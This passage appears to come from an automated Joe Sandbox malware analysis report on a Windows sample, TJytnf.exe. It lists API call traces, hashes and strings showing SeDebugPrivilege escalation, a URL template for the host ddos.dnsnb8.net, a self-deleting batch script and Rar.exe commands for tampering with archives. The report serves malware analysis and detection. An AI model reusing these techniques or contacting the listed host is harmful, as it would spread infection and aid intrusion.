                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: ExitHandleModuleProcessQueryVirtual
                            • String ID:
                            • API String ID: 3946701194-0
                            • Opcode ID: 7bb37be92e96dfa846122a8e8802a26ad40df9fc01a7a7eb5aa24391fa0be04d
                            • Instruction ID: f7647c4603c68f5d0de6dd81c9db800a83a7bffaacf345d8a77fe175e3edcddf
                            • Opcode Fuzzy Hash: 7bb37be92e96dfa846122a8e8802a26ad40df9fc01a7a7eb5aa24391fa0be04d
                            • Instruction Fuzzy Hash: 35115EB1901314DFCB10EFA6EC8477EB7ACEB84718B16402EF912D7190D2308A41EB50

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 401 c01915-c01922 402 c01924-c01926 401->402 403 c01928-c0192c 401->403 404 c0196e-c01970 402->404 405 c0192e-c0194d memset GetFileTime 403->405 406 c0194f-c01952 403->406 407 c01966-c01968 405->407 406->404 408 c01954-c01960 SetFileTime 406->408 409 c0196a 407->409 410 c0196c 407->410 408->407 409->410 410->404
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: FileTimememset
                            • String ID:
                            • API String ID: 176422537-0
                            • Opcode ID: d585eda395a0a0ce915ccf502baccba840bc962f5f68440df5f3ef25670b87c1
                            • Instruction ID: 72a047f245a267aa96343a3a52522d3663a0dd33d7c27219f090fe30d59dd6b7
                            • Opcode Fuzzy Hash: d585eda395a0a0ce915ccf502baccba840bc962f5f68440df5f3ef25670b87c1
                            • Instruction Fuzzy Hash: 29F06236200609ABDB20DE26DC04FABB7ACAB50365F04853AF966D10D0E730E745DBB0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 411 c06159-c06189 VirtualFree 412 c0618c-c06192 411->412 413 c060c7-c060cf 412->413 414 c06198-c061b0 VirtualFree 412->414 413->412 415 c060d5-c060f8 VirtualAlloc 413->415 416 c061b2-c061b4 414->416 417 c061ba-c061c8 414->417 435 c060fa-c060fc call c066c8 415->435 436 c060fe-c06106 415->436 416->417 419 c06243-c06251 417->419 420 c061ca-c061d7 417->420 422 c06253 419->422 423 c06264-c0626f 419->423 424 c061dd-c061e0 420->424 426 c06255-c06258 422->426 427 c06271-c06276 423->427 424->419 428 c061e2-c061f2 424->428 426->423 430 c0625a-c06262 426->430 431 c06389-c063b1 VirtualProtect 427->431 432 c0627c-c06289 427->432 433 c061f5-c061fe 428->433 430->426 434 c063b7-c063ba 431->434 453 c06292-c06298 432->453 454 c0628b 432->454 437 c06200-c06203 433->437 438 c0620c-c06219 433->438 439 c063fc-c06416 VirtualProtect 434->439 440 c063bc-c063c2 434->440 435->436 443 c06155-c06189 VirtualFree 436->443 444 c06108-c0611d 436->444 446 c06205-c06208 437->446 447 c0621b-c06228 437->447 441 c06238-c0623f 438->441 461 c06420-c06425 439->461 462 c06418-c0641d 439->462 440->440 449 c063c4 440->449 441->433 448 c06241 441->448 443->412 451 c0611f-c06121 444->451 455 c0622a-c06236 446->455 456 c0620a 446->456 447->441 448->424 449->439 458 c063c6-c063cf 449->458 459 c06151-c06154 451->459 460 c06123 451->460 457 c062a2-c062ac 453->457 454->453 455->441 456->441 463 c062b1-c062c8 457->463 464 c062ae 457->464 465 c063d1 458->465 466 c063d4-c063d8 458->466 459->443 460->459 467 c06125-c06128 460->467 468 c06373-c06384 463->468 469 c062ce-c062d4 463->469 464->463 465->466 470 c063da 466->470 471 c063dd-c063e1 466->471 472 c06134-c0613b 467->472 473 c0612a-c0612e 467->473 468->427 475 c062d6-c062d9 469->475 476 c062da-c062f1 469->476 470->471 477 c063e3 471->477 478 c063e7-c063fa VirtualProtect 471->478 480 c06130-c06132 472->480 481 c0613d-c0614f 472->481 473->472 473->480 475->476 483 c062f3-c062f9 476->483 484 c06365-c0636e 476->484 477->478 478->434 478->439 480->451 481->451 485 c06314-c06326 483->485 486 c062fb-c0630f 483->486 484->457 488 c06328-c0634a 485->488 489 c0634c-c06360 485->489 487 c06426-c064a9 486->487 498 c06519-c0651c 487->498 499 c064ab-c064c0 487->499 488->484 489->487 500 c06583-c06587 498->500 501 c0651d-c0651e 498->501 505 c064c2 499->505 506 c06535-c06537 499->506 503 c06588-c0658b 500->503 504 c06522-c06533 501->504 509 c065a1-c065a3 503->509 510 c0658d-c0658f 503->510 504->506 507 c064c5-c064cd 505->507 508 c064f8 505->508 511 c06539 506->511 512 c0659a 506->512 515 c06542-c06545 507->515 516 c064cf-c064d4 507->516 518 c064fa-c064fe 508->518 519 c0656c-c0656f 508->519 520 c06591-c06593 510->520 513 c065b4 511->513 514 c0653b-c06541 511->514 517 c0659b-c0659d 512->517 525 c065be-c065db 513->525 514->515 521 c0654d-c06550 515->521 522 c064d6-c064d9 516->522 523 c06517-c06518 516->523 517->520 524 c0659f 517->524 526 c06500 518->526 527 c06572 518->527 519->527 520->517 528 c06595 520->528 521->525 529 c06552-c06556 521->529 522->521 530 c064db-c064f5 522->530 523->498 524->503 531 c065dd-c065f6 525->531 526->504 532 c06502 526->532 533 c06573-c06576 527->533 528->512 534 c06578-c0657a 529->534 535 c06558-c06569 529->535 530->508 536 c065f7-c06608 531->536 532->533 537 c06504-c06513 532->537 533->534 534->531 538 c0657c 534->538 535->519 537->506 539 c06515 537->539 538->536 540 c0657e-c0657f 538->540 539->523 540->500
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00C060DF
                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00C06189
                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00C061A5
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: Virtual$Free$Alloc
                            • String ID:
                            • API String ID: 1852963964-0
                            • Opcode ID: 63fcbfb7bcd846f295691ce683d2965f044bc0a847b770f9bb1a12921d6084a2
                            • Instruction ID: b23289e85f25cd2be7b6e4e767eff3cd3b70c9eedd6b3dd18886a24c202fea21
                            • Opcode Fuzzy Hash: 63fcbfb7bcd846f295691ce683d2965f044bc0a847b770f9bb1a12921d6084a2
                            • Instruction Fuzzy Hash: FA116A72A006598BCF318F58CC817DE37A2EF00301F694528DE8A6B2D1DA716A60CB94
                            APIs
                            • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\TJytnf.exe,?,?,?,?,?,?,00C013EF), ref: 00C011AB
                            • OpenProcessToken.ADVAPI32(00000000,00000028,00C013EF,?,?,?,?,?,?,00C013EF), ref: 00C011BB
                            • AdjustTokenPrivileges.ADVAPI32(00C013EF,00000000,?,00000010,00000000,00000000), ref: 00C011EB
                            • CloseHandle.KERNEL32(00C013EF), ref: 00C011FA
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00C013EF), ref: 00C01203
                            Strings
                            • C:\Users\user\AppData\Local\Temp\TJytnf.exe, xrefs: 00C011A5
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                            • String ID: C:\Users\user\AppData\Local\Temp\TJytnf.exe
                            • API String ID: 75692138-3710522437
                            • Opcode ID: 6d874f812aff5592c95d63fdf9ed41d3daa39583a29064f7dd7dcdbf0bbfa1a0
                            • Instruction ID: ef62de3deddea9d176af62f08a0e0f66e9bdc9947b058785cf4f9056084ed0d5
                            • Opcode Fuzzy Hash: 6d874f812aff5592c95d63fdf9ed41d3daa39583a29064f7dd7dcdbf0bbfa1a0
                            • Instruction Fuzzy Hash: EB01D2B5901249EFDB00DFE4C989BAEBBBCFB04309F104469E606A2291D7759F44DB60
                            APIs
                            • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C013BC
                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00C013DA
                            • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00C01448
                              • Part of subcall function 00C0119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\TJytnf.exe,?,?,?,?,?,?,00C013EF), ref: 00C011AB
                              • Part of subcall function 00C0119F: OpenProcessToken.ADVAPI32(00000000,00000028,00C013EF,?,?,?,?,?,?,00C013EF), ref: 00C011BB
                              • Part of subcall function 00C0119F: AdjustTokenPrivileges.ADVAPI32(00C013EF,00000000,?,00000010,00000000,00000000), ref: 00C011EB
                              • Part of subcall function 00C0119F: CloseHandle.KERNEL32(00C013EF), ref: 00C011FA
                              • Part of subcall function 00C0119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00C013EF), ref: 00C01203
                            Strings
                            • C:\Users\user\AppData\Local\Temp\TJytnf.exe, xrefs: 00C013A8
                            • SeDebugPrivilege, xrefs: 00C013D3
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                            • String ID: C:\Users\user\AppData\Local\Temp\TJytnf.exe$SeDebugPrivilege
                            • API String ID: 4123949106-3018621369
                            • Opcode ID: 5424a6947bfb16dc25c87de507bfb5699508e4ffdc9be3e637e2383624029a8d
                            • Instruction ID: 26703a6120e9e2ce9100e7ca1506f53f55f28d336ab2c1a916bf65baed7d73a0
                            • Opcode Fuzzy Hash: 5424a6947bfb16dc25c87de507bfb5699508e4ffdc9be3e637e2383624029a8d
                            • Instruction Fuzzy Hash: F6313C71D00209EAEF20DBA6CC45FEEFBB8EB84704F24416AE914B31A1D7709E45CB60
                            APIs
                            • strstr.MSVCRT ref: 00C023CC
                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C02464
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00C02472
                            • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00C024A8
                            • memset.MSVCRT ref: 00C024B9
                            • strrchr.MSVCRT ref: 00C024C9
                            • wsprintfA.USER32 ref: 00C024DE
                            • strrchr.MSVCRT ref: 00C024ED
                            • memset.MSVCRT ref: 00C024F2
                            • memset.MSVCRT ref: 00C02505
                            • wsprintfA.USER32 ref: 00C02524
                            • Sleep.KERNEL32(000007D0), ref: 00C02535
                            • Sleep.KERNEL32(000007D0), ref: 00C0255D
                            • memset.MSVCRT ref: 00C0256E
                            • wsprintfA.USER32 ref: 00C02585
                            • memset.MSVCRT ref: 00C025A6
                            • wsprintfA.USER32 ref: 00C025CA
                            • Sleep.KERNEL32(000007D0), ref: 00C025D0
                            • Sleep.KERNEL32(000007D0,?,?), ref: 00C025E5
                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C025FC
                            • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00C02611
                            • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00C02642
                            • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00C0265B
                            • SetEndOfFile.KERNEL32 ref: 00C0266D
                            • CloseHandle.KERNEL32(00000000), ref: 00C02676
                            • RemoveDirectoryA.KERNEL32(?), ref: 00C02681
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                            • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                            • API String ID: 2203340711-2169341206
                            • Opcode ID: 7b6c99a1307edcbd8c5300b6a0e6e3cfbb36c8246cd2f61addb9dfebb0b252c0
                            • Instruction ID: eeaf9578139533f5eb71334f88f9b8c55b191daf91510e6201063437ef604a18
                            • Opcode Fuzzy Hash: 7b6c99a1307edcbd8c5300b6a0e6e3cfbb36c8246cd2f61addb9dfebb0b252c0
                            • Instruction Fuzzy Hash: E8818FB1508344ABD7109FA0DC89FAFB7ACEB88704F00492AFA95D21D0D775DA49CB66
                            APIs
                            • memset.MSVCRT ref: 00C02766
                            • memset.MSVCRT ref: 00C02774
                            • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00C02787
                            • wsprintfA.USER32 ref: 00C027AB
                              • Part of subcall function 00C0185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00C01118), ref: 00C01867
                              • Part of subcall function 00C0185B: srand.MSVCRT ref: 00C01878
                              • Part of subcall function 00C0185B: rand.MSVCRT ref: 00C01880
                              • Part of subcall function 00C0185B: srand.MSVCRT ref: 00C01890
                              • Part of subcall function 00C0185B: rand.MSVCRT ref: 00C01894
                            • wsprintfA.USER32 ref: 00C027C6
                            • CopyFileA.KERNEL32(?,00C04C80,00000000), ref: 00C027D4
                            • wsprintfA.USER32 ref: 00C027F4
                              • Part of subcall function 00C01973: PathFileExistsA.SHLWAPI(00C04E5C,00000000,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C01992
                              • Part of subcall function 00C01973: CreateFileA.KERNEL32(00C04E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00C019BA
                              • Part of subcall function 00C01973: Sleep.KERNEL32(00000064), ref: 00C019C6
                              • Part of subcall function 00C01973: wsprintfA.USER32 ref: 00C019EC
                              • Part of subcall function 00C01973: CopyFileA.KERNEL32(00C04E5C,?,00000000), ref: 00C01A00
                              • Part of subcall function 00C01973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C01A1E
                              • Part of subcall function 00C01973: GetFileSize.KERNEL32(00C04E5C,00000000), ref: 00C01A2C
                              • Part of subcall function 00C01973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00C01A46
                              • Part of subcall function 00C01973: ReadFile.KERNEL32(00C04E5C,00C04E60,00000000,?,00000000), ref: 00C01A65
                            • DeleteFileA.KERNEL32(?,?,00C04E54,00C04E58), ref: 00C0281A
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00C04E54,00C04E58), ref: 00C02832
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                            • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                            • API String ID: 692489704-3961832207
                            • Opcode ID: 812a3526efd665fed0cbaf24726e6f4c93ac19b001677a2590079892d67486b5
                            • Instruction ID: 9f4c1716a7da36e926114d1e201920beade8fc03744d17a6342c4e26b36f2d57
                            • Opcode Fuzzy Hash: 812a3526efd665fed0cbaf24726e6f4c93ac19b001677a2590079892d67486b5
                            • Instruction Fuzzy Hash: B1214FF694025C7BEB10E7A49C89FEB776CEB04748F0105B2B754E20C2E6709F84CAA0
                            APIs
                              • Part of subcall function 00C0185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00C01118), ref: 00C01867
                              • Part of subcall function 00C0185B: srand.MSVCRT ref: 00C01878
                              • Part of subcall function 00C0185B: rand.MSVCRT ref: 00C01880
                              • Part of subcall function 00C0185B: srand.MSVCRT ref: 00C01890
                              • Part of subcall function 00C0185B: rand.MSVCRT ref: 00C01894
                            • wsprintfA.USER32 ref: 00C015AA
                            • wsprintfA.USER32 ref: 00C015C6
                            • lstrlen.KERNEL32(?), ref: 00C015D2
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00C015EE
                            • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00C01609
                            • CloseHandle.KERNEL32(00000000), ref: 00C01612
                            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C0162D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                            • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\TJytnf.exe$open
                            • API String ID: 617340118-3796865183
                            • Opcode ID: fa6e78c1f7e8cd435c4ee4d592e9f615afadfc43fbbcd33b73924ceb6edacb59
                            • Instruction ID: 4379fc3fcd1cbfdf134584113d5ec2e40bcc48dc285fd1442fc88b0c65a4d848
                            • Opcode Fuzzy Hash: fa6e78c1f7e8cd435c4ee4d592e9f615afadfc43fbbcd33b73924ceb6edacb59
                            • Instruction Fuzzy Hash: 031151B2A021687AD72097A59C89FEF7A6CEF59754F010061FA49E2080DA709B84CBB0
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00C01400), ref: 00C01226
                            • GetProcAddress.KERNEL32(00000000), ref: 00C0122D
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00C01400), ref: 00C0123F
                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00C01400), ref: 00C01250
                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\TJytnf.exe,?,?,?,?,00C01400), ref: 00C0129E
                            • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\TJytnf.exe,?,?,?,?,00C01400), ref: 00C012B0
                            • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\TJytnf.exe,?,?,?,?,00C01400), ref: 00C012F5
                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00C01400), ref: 00C0130A
                            Strings
                            • C:\Users\user\AppData\Local\Temp\TJytnf.exe, xrefs: 00C01262
                            • ntdll.dll, xrefs: 00C01219
                            • ZwQuerySystemInformation, xrefs: 00C01212
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                            • String ID: C:\Users\user\AppData\Local\Temp\TJytnf.exe$ZwQuerySystemInformation$ntdll.dll
                            • API String ID: 1500695312-3486291088
                            • Opcode ID: c6fedd036cb9c8ad58cadb01d3569a1adbd860e0667f4e333b91e42cc7dc124f
                            • Instruction ID: ad7eb013d96c8d75b6280ca9c0b6065d0b2c07e29a7b6c274fb328db3b197d63
                            • Opcode Fuzzy Hash: c6fedd036cb9c8ad58cadb01d3569a1adbd860e0667f4e333b91e42cc7dc124f
                            • Instruction Fuzzy Hash: E121DD71706391ABD7209B65CC08B6FFAACFB89B14F090928FA55E62D0C770DB44C7A5
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00C01118), ref: 00C01867
                            • srand.MSVCRT ref: 00C01878
                            • rand.MSVCRT ref: 00C01880
                            • srand.MSVCRT ref: 00C01890
                            • rand.MSVCRT ref: 00C01894
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: Timerandsrand$FileSystem
                            • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                            • API String ID: 4106363736-3273462101
                            • Opcode ID: 17f7b5ff9376be771718e5c33fd2105cb4b29dea74226c5edc8eb82a55c059a2
                            • Instruction ID: 0dbb97a21be1b774b0334212c49d7419574a7835e277927544e90f102622fd1e
                            • Opcode Fuzzy Hash: 17f7b5ff9376be771718e5c33fd2105cb4b29dea74226c5edc8eb82a55c059a2
                            • Instruction Fuzzy Hash: CDE0D877A0022CBFE700A7F9EC46A9EBBACDE84165B110527F600D3250E970FD44CAB4
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,00C029DB,?,00000001), ref: 00C026A7
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,00C029DB,?,00000001), ref: 00C026B5
                            • lstrlen.KERNEL32(?), ref: 00C026C4
                            • ??2@YAPAXI@Z.MSVCRT ref: 00C026CE
                            • lstrcpy.KERNEL32(00000004,?), ref: 00C026E3
                            • lstrcpy.KERNEL32(?,00000004), ref: 00C0271F
                            • ??3@YAXPAX@Z.MSVCRT ref: 00C0272D
                            • SetEvent.KERNEL32 ref: 00C0273C
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                            • String ID:
                            • API String ID: 41106472-0
                            • Opcode ID: 6b6e650fdd7e7b6f7ffba6857ebeb59ddb43fc19d763cc15dfe523adb6304c20
                            • Instruction ID: 19216a5eb4f0442027187bc5266590de7b1584c564cd205edc6fd1249f436550
                            • Opcode Fuzzy Hash: 6b6e650fdd7e7b6f7ffba6857ebeb59ddb43fc19d763cc15dfe523adb6304c20
                            • Instruction Fuzzy Hash: CA119DB6501210EFCB219F19EC4CB5FBBADFB84B207124016F968871A0D7708A85DB50
                            APIs
                            Strings
                            • .exe, xrefs: 00C01C57
                            • ifuIwLhQukfdnSndMjHyxORRmsDeLmvpFZlGCBPEjcGWLwGDFKYgxbRMdtJifkzIWTgnaCgKvlBcorymOyTYVAINbwzrcpDAEzuVtSqqqNJQXUhJvAXosijheBoYsMbaQUSHWXEZtPPeKTrOUkHNpVlaFZxC, xrefs: 00C01B8A, 00C01B9C, 00C01C15, 00C01C49
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: lstrcatmemcpymemsetrandsrand
                            • String ID: .exe$ifuIwLhQukfdnSndMjHyxORRmsDeLmvpFZlGCBPEjcGWLwGDFKYgxbRMdtJifkzIWTgnaCgKvlBcorymOyTYVAINbwzrcpDAEzuVtSqqqNJQXUhJvAXosijheBoYsMbaQUSHWXEZtPPeKTrOUkHNpVlaFZxC
                            • API String ID: 122620767-470473977
                            • Opcode ID: 0f86209f2479c0d4099223d990b8ff54e9053779ba8980bc6cdfb4ef88c6539a
                            • Instruction ID: b5c7d9b1031364d91b0f780325562def98087c16d67370e0a1135d0281e4317a
                            • Opcode Fuzzy Hash: 0f86209f2479c0d4099223d990b8ff54e9053779ba8980bc6cdfb4ef88c6539a
                            • Instruction Fuzzy Hash: FD213EB2E452A06EE3192335EC40B6EBB449FE3B11F1B4099FE951B1D2D2640695D264
